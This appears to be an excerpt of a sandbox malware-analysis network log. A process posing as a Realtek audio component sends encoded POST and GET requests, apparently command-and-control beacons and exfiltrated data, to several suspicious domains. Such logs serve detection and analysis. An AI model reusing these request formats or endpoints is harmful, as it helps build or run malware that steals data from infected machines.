                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:04.844867945 CET | 546 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:04 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.11.20 | 49784 | 38.47.233.4 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:10.293055058 CET | 671 | OUT | POST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZWGoKx2zAgBmnPCibIthmUnftVNpMV9V1Y5S4PpA3i25EtsJ1OrOED86OiiGUVCB93lcHZ6gRVszEPHuWjajgSRoMEM8pjXO4Fe9kGTMRCJkOoWu8YkydPjbY6pLGp1ifOBcKrBWRJK3Ig3RXHgWzPn5IgsFLCYNNsn6NkmXm+jp9xw0Ulsx7Q==
Dec 3, 2024 14:53:10.612310886 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:10 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49785 | 38.47.233.4 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:13.142272949 CET | 691 | OUT | POST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZ0SoJQ2zXwBlrvCiRosqmUrftR9HMnZV15JS5OpA7C25ONsQ7uqAEDxPOnaGUVWB91tcGuGjQFs1LvHoLzajgSRoMEYSpjPO71O9kk7LKiJnJoWu34kMdPjDY7kgGsxifPxcJ6BZIZL8WQ2BUGQb2PTTHyYMKnArFaqgQWSzlt/b5BJcWntqmV2itsgj9Z/dQVd1PNg0HTU=
Dec 3, 2024 14:53:13.461844921 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:13 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49786 | 38.47.233.4 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:15.985086918 CET | 2578 | OUT | POST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:15.985142946 CET | 5262 | OUT
                                                                                                                                                                                                                                Data Ascii: 7EEysqe8KH7BBQL1DPF4FRqh9R137dCj+IEb/FxkOADHxPvXGh0ApePG9zp5K8KhhHcLrN4eTM2PtODEjHlAAJRCe1L+Xbu/WwRZOhpxTH124YaYkaTkJkAZQPba5i9LeNX1UaCPGwWwaoL8aUG2ipFXulQxmPkI6HSw1Tb8BbxveOjSIt+qBktm/K6mF7aaUZjwXA/vATPUaSOUBtpocQUsyXSI7Tzxvo4J7IkeC/C+Nvm86o8
Dec 3, 2024 14:53:16.304142952 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:16 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49787 | 38.47.233.4 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:18.827400923 CET | 416 | OUT | GET /mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:19.146908045 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49788 | 103.224.182.242 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:24.509988070 CET | 689 | OUT | POST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry0vgTcIuzg5vN37T/Pl+ADxoEQXM4UMTIc3n5TvqwZOf2eHShLE4YNwHhNcML2Oxi0qPv8nNnBIVN2oRCn34Zfk3Tr4GJIUBelwJQTPVvK//k1gvrIo0IQC40c1bohIsPrA19+adr2LYxb3qmkGqtaFbi1DNyPY8ISVLOgK9xlSd9sZpeIabnZA==
Dec 3, 2024 14:53:24.700347900 CET | 874 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:24 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234004.7002375; expires=Fri, 01-Dec-2034 13:53:24 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49789 | 103.224.182.242 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:27.206959963 CET | 709 | OUT | POST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry1PwTTLWzr5vO9bT/B1+cDxsEQTVzU/nIcTj5SuqwYOf2WnSkUU5UNwLpNeIL2Oli0oXv/U1oHIVDt4RApX4Zfk3Tr5mzIUZelDRQCeVoJ//n9AvrC40EQC5Rc0HChKkPrFR9/Lds8LYzGnrG0mD/akiRjhBzXaMjXDGU94JVmBBPopQ2KYa8EKRdvH0/K/zRDQ8C9GJwC88=
Dec 3, 2024 14:53:27.401585102 CET | 874 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:27 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234007.2576216; expires=Fri, 01-Dec-2034 13:53:27 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49790 | 103.224.182.242 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:29.909235001 CET | 2578 | OUT | POST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:29.909264088 CET | 5156 | OUT |
                                                                                                                                                                                                                                Data Ascii: +3+n9Qh7oF/2PPsLDgup2ekt9zX2ogjweoefo5gnvRRiPKhvSttV/B2CkZ0cPFImB6muzTRIlCxewG4BavWj4vZPPS4pejifR3iTJ1attUBLhYYgMq+0+qVyFTlLQAVp7xe2rVC6lO/iwnpXLLR1x204NIAJHLun05kRUmQpI1DBxu2e5g3f8gbIuQoI1iht6BCG2Swb+BMwevu6xy0JvCWepCc5FeSrApqcfp9BGvNYwg8Qqvu
Dec 3, 2024 14:53:29.909336090 CET | 124 | OUT |
                                                                                                                                                                                                                                Data Ascii: Rsx5z1dhk1fgkOqlGj3FJGLfTSFGTA35VvLmHUYf2wgGqjIpHComf2Coqt6zXdXOxMYyLVMUud8RBe4aRH2TcQlEX8n91Iq/SoYlU556K4LxCSW7kkKpMulDjg==
Dec 3, 2024 14:53:30.117734909 CET | 874 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:29 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234009.7981421; expires=Fri, 01-Dec-2034 13:53:29 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.11.20 | 49791 | 103.224.182.242 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:32.610766888 CET | 422 | OUT | GET /vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0= HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:32.805866003 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:53:32 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234012.2878163; expires=Fri, 01-Dec-2034 13:53:32 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-length: 1501
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>brickhills.site</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: non [TRUNCATED]
Dec 3, 2024 14:53:32.805881977 CET | 484 | IN |
                                                                                                                                                                                                                                Data Ascii: a href='http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&fp=-3'>Click here to enter</a></div><noscript><meta http-e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.11.20 | 49792 | 172.67.201.49 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:46.224631071 CET | 692 | OUT | POST /qrpv/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.goldbracelet.top
                                                                                                                                                                                                                                Referer: http://www.goldbracelet.top/qrpv/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=bg/UIEu2P0kxTzr9/Je5OXxAWJsY4AnAooFy6R56/HAqovRj+4j8pXhNCEBqKvnomhkxvIqcYEeGuwe4RHR3OGjsKJpUMKtPFCJIiF5xiyW1NU0I5JWw7anFdFnDr1luhPVOgLi6RT/3mlyS2rRmUTfJME1nX24dRgbt2W/eiEGNMk4kwMFzU29ChoERR6vAcQ==
Dec 3, 2024 14:53:46.363487005 CET | 916 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:46 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONeeRoabhrNsJJhgdNF9R3wL3UE7ON6xRxKxvuOUFjoMUehqYhaGj3iFTc6tENmViJNABpc9iUmHIUfxNi%2BfyPaxS5GEoiZ3gQUFIHJ3f5cp6lRi4bKF5Kf5IICJHDiFBycduC9AVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40b783c4143c9-EWR
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=102805&min_rtt=102805&rtt_var=51402&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=692&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 3, 2024 14:53:46.363590002 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.11.20 | 49793 | 172.67.201.49 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:48.855215073 CET | 712 | OUT | POST /qrpv/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.goldbracelet.top
                                                                                                                                                                                                                                Referer: http://www.goldbracelet.top/qrpv/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=bg/UIEu2P0kxSSb99qm5J3xDZpsY3gmJooJy6Q89/VUqpPBj58X8uXhNMkBrFPnhmhoPvNCcYE6Gu1i4Q0J4OWjyFppaCqtPFCJIiFtbiyO1NlEI5oWz6anKMFnDgVlqhPUdgK/dRRH3mgOS36RhbTfLCk1zSWVyeQ3N7XfznWW6Ny1+t+xXXlhwlY95T4ubBaS0S2bGXIZ09FOoyMBj8Ds=
Dec 3, 2024 14:53:48.988478899 CET | 922 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:48 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o5XxtAP1KZgtxTkAjy8mtLYFaG9eSo0eGmy8AAmKSOXHeb3SBaTfqnvRix%2FOdf%2F%2FD84HlRaNnZujrV0Ob01l2ujWtw7MoynFLFycsSPKgn0Y%2FtT3pzegW9pfZNUnQ9tYssE7Wxy1Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40b88ad50de97-EWR
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=102703&min_rtt=102703&rtt_var=51351&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 3, 2024 14:53:48.988488913 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49794 | 172.67.201.49 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:51.480022907 CET | 2578 | OUT | POST /qrpv/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.goldbracelet.top
                                                                                                                                                                                                                                Referer: http://www.goldbracelet.top/qrpv/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:53:51.480047941 CET | 5156 | OUT
                                                                                                                                                                                                                                Data Ascii: a9NcWtxEe87MF3glvk1XAFJxrIJs2oFaOjDHUZUsksoNqvFbJzYoJeky+ZQYGqrT0uhA3DkxlU2clucwRr8Zv7En9edKU8w1ApeA6nKKxM2/PLSJOAciFZcqnFxj45FnU2rmGL+VrOqHcd/LkQGgNCnotLW2XWpr3ZCv2zAlXvsmDQufw8ERs2k7ZT0+nxt7E3aJDXIK8CGp5hwCsHwUPqyTmL7m284ti9uFWN6rGzssWWlPzay
Dec 3, 2024 14:53:51.480120897 CET | 127 | OUT
                                                                                                                                                                                                                                Data Ascii: 8x3m5NCCqu1o6YD69hDBOWhZt3xdB/wSOq29y5I5Au6plDVsRi3lpSzULZSzScyXkoKHt5MXc+hjDjfvoL0nFjBn5zj0yCCNaNclToJyM16a25Yf2rSR9Bbx4v1aA==
Dec 3, 2024 14:53:51.624552011 CET | 927 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:53:51 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8C%2F9sTr3ONQ4CfGEP5rT6wQlo10UdzNLgGgcczkSoWInLFix4%2FssDoQQDb13lKr6oSbecX7GxlZDglKH%2BZIgd4kDMCJQwUr3h3hY5p3I4ZEoAIb%2FACKLcwwHVAEL%2BS%2FQ1PYM22rFAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ec40b99082b19cf-EWR
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=103063&min_rtt=103063&rtt_var=51531&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7861&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 3, 2024 14:53:51.624597073 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 49795 | 172.67.201.49 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:53:54.103291988 CET | 423 | OUT | GET /qrpv/?Z1EO=OvfHeluUy&pluxVm=WiX0LzPqOnM4b37+7/q2MnJgJJwmlCG/8poUwA5NsFkBp/VurdzYoSVVPF8rA/Ka5BkZn+mZS0ORkGe6TXFOOAiLIJoZGeMwExFXk2ddigf2T3UmxoiawIQ= HTTP/1.1
                                                                                                                                                                                                                                Host: www.goldbracelet.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
